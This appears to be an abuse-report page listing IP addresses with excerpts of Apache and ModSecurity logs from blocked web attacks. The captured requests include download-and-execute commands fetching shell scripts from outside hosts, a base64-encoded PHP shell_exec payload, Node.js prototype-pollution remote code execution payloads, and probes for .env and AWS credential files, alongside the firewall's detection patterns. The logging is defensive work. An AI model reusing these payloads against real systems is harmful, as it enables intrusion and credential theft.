|
๐บ๐ธ
216.180.246.211
|
|
[Sun Jul 12 17:37:23.767361 2026] [core:info] [pid 336664:tid 336843] [client 216.180.246.211:32392] ...
show more
[Sun Jul 12 17:37:23.767361 2026] [core:info] [pid 336664:tid 336843] [client 216.180.246.211:32392] AH00128: File does not exist: /home/harald/www/default_host/admin/index.html
...
show less
|
Bad Web Bot
|
|
๐ฑ๐น
62.60.130.228
|
|
[Sun Jul 12 17:13:33.125903 2026] [core:info] [pid 336256:tid 336371] [client 62.60.130.228:52443] A ...
show more
[Sun Jul 12 17:13:33.125903 2026] [core:info] [pid 336256:tid 336371] [client 62.60.130.228:52443] AH00128: File does not exist: /home/harald/www/blogs/media/media/cache.php, referer: www.google.com
...
show less
|
Bad Web Bot
|
|
๐ธ๐ฌ
52.221.210.211
|
|
[Sun Jul 12 16:55:14.249583 2026] [security2:error] [pid 336779:tid 336912] [client 52.221.210.211:5 ...
show more
[Sun Jul 12 16:55:14.249583 2026] [security2:error] [pid 336779:tid 336912] [client 52.221.210.211:51898] [client 52.221.210.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "a
...
show less
|
Web App Attack
|
|
๐ฎ๐ณ
15.252.18.65
|
|
[Sun Jul 12 14:36:18.004365 2026] [security2:error] [pid 318497:tid 318608] [client 15.252.18.65:488 ...
show more
[Sun Jul 12 14:36:18.004365 2026] [security2:error] [pid 318497:tid 318608] [client 15.252.18.65:48890] [client 15.252.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attac
...
show less
|
Web App Attack
|
|
๐ณ๐ฑ
45.153.34.219
|
|
[Sun Jul 12 14:00:33.791510 2026] [security2:error] [pid 319119:tid 319257] [client 45.153.34.219:37 ...
show more
[Sun Jul 12 14:00:33.791510 2026] [security2:error] [pid 319119:tid 319257] [client 45.153.34.219:37324] [client 45.153.34.219] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:l[\\\\\\\\'\\"]* ..." at ARGS:ttcp_ip. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: ;curl found within ARGS:ttcp_ip: -h `cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s lmoon;busybox wget http://91.92.40.118/wget.sh -O-|sh -s lmoon;curl http://91.92.40.118/wget.sh|sh -s lmoon`"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"
...
show less
|
Web App Attack
|
|
๐ฉ๐ช
172.104.146.126
|
|
[Sun Jul 12 13:51:28.909501 2026] [core:info] [pid 300939:tid 301049] [client 172.104.146.126:44752] ...
show more
[Sun Jul 12 13:51:28.909501 2026] [core:info] [pid 300939:tid 301049] [client 172.104.146.126:44752] AH00128: File does not exist: /home/harald/www/default_host/admin
...
show less
|
Bad Web Bot
|
|
๐ง๐ท
20.226.66.230
|
|
[Sun Jul 12 12:56:16.142672 2026] [core:info] [pid 300739:tid 300848] [client 20.226.66.230:31828] A ...
show more
[Sun Jul 12 12:56:16.142672 2026] [core:info] [pid 300739:tid 300848] [client 20.226.66.230:31828] AH00128: File does not exist: /home/harald/www/webmail/wp-content/admin.php
...
show less
|
Bad Web Bot
|
|
๐ธ๐ฌ
213.111.158.220
|
|
[Sun Jul 12 12:04:00.163950 2026] [core:info] [pid 301265:tid 301407] [client 213.111.158.220:61740] ...
show more
[Sun Jul 12 12:04:00.163950 2026] [core:info] [pid 301265:tid 301407] [client 213.111.158.220:61740] AH00128: File does not exist: /home/sabine/www/administrator/manifests/files/joomla.xml
...
show less
|
Bad Web Bot
|
|
๐ฌ๐ง
18.170.0.190
|
|
[Sun Jul 12 11:31:55.292633 2026] [security2:error] [pid 282969:tid 283100] [client 18.170.0.190:358 ...
show more
[Sun Jul 12 11:31:55.292633 2026] [security2:error] [pid 282969:tid 283100] [client 18.170.0.190:35818] [client 18.170.0.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attac
...
show less
|
Web App Attack
|
|
๐ซ๐ท
84.17.43.206
|
|
[Sun Jul 12 11:21:09.761697 2026] [core:info] [pid 282787:tid 282930] [client 84.17.43.206:33842] AH ...
show more
[Sun Jul 12 11:21:09.761697 2026] [core:info] [pid 282787:tid 282930] [client 84.17.43.206:33842] AH00128: File does not exist: /home/harald/www/default_host/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
๐บ๐ธ
35.234.176.188
|
|
[Sun Jul 12 10:30:36.519822 2026] [core:info] [pid 283497:tid 283587] [client 35.234.176.188:52554] ...
show more
[Sun Jul 12 10:30:36.519822 2026] [core:info] [pid 283497:tid 283587] [client 35.234.176.188:52554] AH00128: File does not exist: /home/harald/www/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
๐บ๐ธ
34.182.207.73
|
|
[Sun Jul 12 09:26:51.121284 2026] [authz_core:error] [pid 264981:tid 265095] [client 34.182.207.73:6 ...
show more
[Sun Jul 12 09:26:51.121284 2026] [authz_core:error] [pid 264981:tid 265095] [client 34.182.207.73:60670] AH01630: client denied by server configuration: /home/harald/www/aschi.at/xmlrpc.php
...
show less
|
Bad Web Bot
|
|
๐ฑ๐บ
64.89.160.73
|
|
[Sun Jul 12 07:16:12.811496 2026] [security2:error] [pid 247427:tid 247609] [client 64.89.160.73:574 ...
show more
[Sun Jul 12 07:16:12.811496 2026] [security2:error] [pid 247427:tid 247609] [client 64.89.160.73:57408] [client 64.89.160.73] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "78.46.107.184"] [uri "/.env"] [unique_id "alMjHBp-LW_a8cnhygef-gAAAoc"]
[Sun Jul 12 07:16:12.811537 2026] [security2:error] [pid 247427:tid 247614] [client 64.89.160.73:9620] [client 64.89.160.73] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-c
...
show less
|
Web App Attack
|
|
๐ฎ๐ณ
64.227.190.95
|
|
[Sun Jul 12 06:45:53.201060 2026] [core:info] [pid 247043:tid 247215] [client 64.227.190.95:55568] A ...
show more
[Sun Jul 12 06:45:53.201060 2026] [core:info] [pid 247043:tid 247215] [client 64.227.190.95:55568] AH00128: File does not exist: /home/harald/www/default_host/wordpress/wp-login.php
...
show less
|
Bad Web Bot
|
|
๐ณ๐ฑ
45.148.10.200
|
|
[Sun Jul 12 03:41:52.669941 2026] [security2:error] [pid 212293:tid 212403] [client 45.148.10.200:48 ...
show more
[Sun Jul 12 03:41:52.669941 2026] [security2:error] [pid 212293:tid 212403] [client 45.148.10.200:48040] [client 45.148.10.200] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "78.46.107.184"] [uri "/.env.dev"] [unique_id "alLw4DNQkDVxO-HvPfmgOgAAAwM"]
[Sun Jul 12 03:41:52.704539 2026] [security2:error] [pid 212212:tid 212336] [client 45.148.10.200:48052] [client 45.148.10.200] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/
...
show less
|
Web App Attack
|
|
๐ฉ๐ช
185.65.202.199
|
|
[Sun Jul 12 00:54:09.160712 2026] [security2:error] [pid 194671:tid 194731] [client 185.65.202.199:5 ...
show more
[Sun Jul 12 00:54:09.160712 2026] [security2:error] [pid 194671:tid 194731] [client 185.65.202.199:59520] [client 185.65.202.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:m[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*q[\\"\\\\^]*l(?:[\\"\\\\^]*(?:d[\\"\\\\^]*u[\\"\\\\^]*m[\\"\\\\^]*p(?:[\\"\\\\^]*s[\\"\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMjE3LjYwLjE5NS4xMTMvc2ggfHwgY3VybCAtc2sgaHR0cHM6Ly8yMTcuNjAuMTk1LjExMy9zaCkgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [id "932110"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: ; echo found within ARGS:<?php shell_exec(base64
...
show less
|
Web App Attack
|
|
๐ฑ๐บ
64.89.161.160
|
|
[Sun Jul 12 00:10:40.699978 2026] [core:info] [pid 195419:tid 195497] [client 64.89.161.160:51654] A ...
show more
[Sun Jul 12 00:10:40.699978 2026] [core:info] [pid 195419:tid 195497] [client 64.89.161.160:51654] AH00128: File does not exist: /home/harald/www/jqueryupload/server/php/index.php
...
show less
|
Bad Web Bot
|
|
๐ณ๐ฑ
45.153.34.243
|
|
[Sat Jul 11 22:57:21.032390 2026] [security2:error] [pid 174775:tid 174826] [remote 45.153.34.243:61 ...
show more
[Sat Jul 11 22:57:21.032390 2026] [security2:error] [pid 174775:tid 174826] [remote 45.153.34.243:61506] [client 45.153.34.243] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "weavernet.at"] [uri "/.aws/credentials"] [unique_id "alKuMY1matAyw6RzMfzZGAACxhE"], referer: http://weavernet.at/.aws/credentials
[Sat Jul 11 22:57:21.082314 2026] [security2:error] [pid 174775:tid 174828] [remote 45.153.34.243:61506] [client 45.153.34.243] ModSecurity: Access denied wit
...
show less
|
Web App Attack
|
|
๐ต๐ฐ
223.123.43.1
|
|
[Sat Jul 11 22:49:27.963752 2026] [core:info] [pid 174921:tid 175104] [client 223.123.43.1:6822] AH0 ...
show more
[Sat Jul 11 22:49:27.963752 2026] [core:info] [pid 174921:tid 175104] [client 223.123.43.1:6822] AH00128: File does not exist: /home/harald/www/default_host/boaform/admin/formLogin
...
show less
|
Bad Web Bot
|
|
๐บ๐ธ
35.254.244.123
|
|
[Sat Jul 11 22:06:17.213240 2026] [security2:error] [pid 174839:tid 174985] [client 35.254.244.123:7 ...
show more
[Sat Jul 11 22:06:17.213240 2026] [security2:error] [pid 174839:tid 174985] [client 35.254.244.123:7874] [client 35.254.244.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "70"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22x_2d4f8215\\x22:0.0,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22,\\x22reason\\x22:-1,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var iwy=arguments[0x1];var rb=iwy;try{var _v=((0,eval)(global[[66,117,102,102,101,114].map(function(c){return Stri
...
show less
|
Web App Attack
|
|
๐ซ๐ท
62.210.142.169
|
|
[Sat Jul 11 21:59:28.296501 2026] [core:info] [pid 174878:tid 175000] [client 62.210.142.169:55842] ...
show more
[Sat Jul 11 21:59:28.296501 2026] [core:info] [pid 174878:tid 175000] [client 62.210.142.169:55842] AH00128: File does not exist: /home/harald/www/default_host/admin/index.html
...
show less
|
Bad Web Bot
|
|
๐บ๐ธ
66.187.5.19
|
|
[Sat Jul 11 16:38:07.870823 2026] [security2:error] [pid 120762:tid 120913] [client 66.187.5.19:5829 ...
show more
[Sat Jul 11 16:38:07.870823 2026] [security2:error] [pid 120762:tid 120913] [client 66.187.5.19:58292] [client 66.187.5.19] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "26th.eu"] [uri "/.env"] [unique_id "alJVT3mDz9EjtziV7bw2PAAABC4"]
[Sat Jul 11 16:38:08.096344 2026] [security2:error] [pid 120762:tid 120914] [client 66.187.5.19:58292] [client 66.187.5.19] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/
...
show less
|
Web App Attack
|
|
๐ซ๐ท
85.204.70.102
|
|
[Sat Jul 11 16:20:08.407158 2026] [core:info] [pid 120762:tid 120899] [client 85.204.70.102:39742] A ...
show more
[Sat Jul 11 16:20:08.407158 2026] [core:info] [pid 120762:tid 120899] [client 85.204.70.102:39742] AH00128: File does not exist: /home/harald/www/fehlende.info/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
๐ธ๐ฌ
52.230.33.134
|
|
[Sat Jul 11 16:11:37.497736 2026] [core:info] [pid 120715:tid 120840] [client 52.230.33.134:17623] A ...
show more
[Sat Jul 11 16:11:37.497736 2026] [core:info] [pid 120715:tid 120840] [client 52.230.33.134:17623] AH00128: File does not exist: /home/divisio/www/admin/function.php
...
show less
|
Bad Web Bot
|
|
๐ฎ๐ท
188.229.74.41
|
|
[Sat Jul 11 15:40:30.791322 2026] [core:info] [pid 102878:tid 103068] [client 188.229.74.41:6384] AH ...
show more
[Sat Jul 11 15:40:30.791322 2026] [core:info] [pid 102878:tid 103068] [client 188.229.74.41:6384] AH00128: File does not exist: /home/harald/www/DomainBLDB/admin/
...
show less
|
Bad Web Bot
|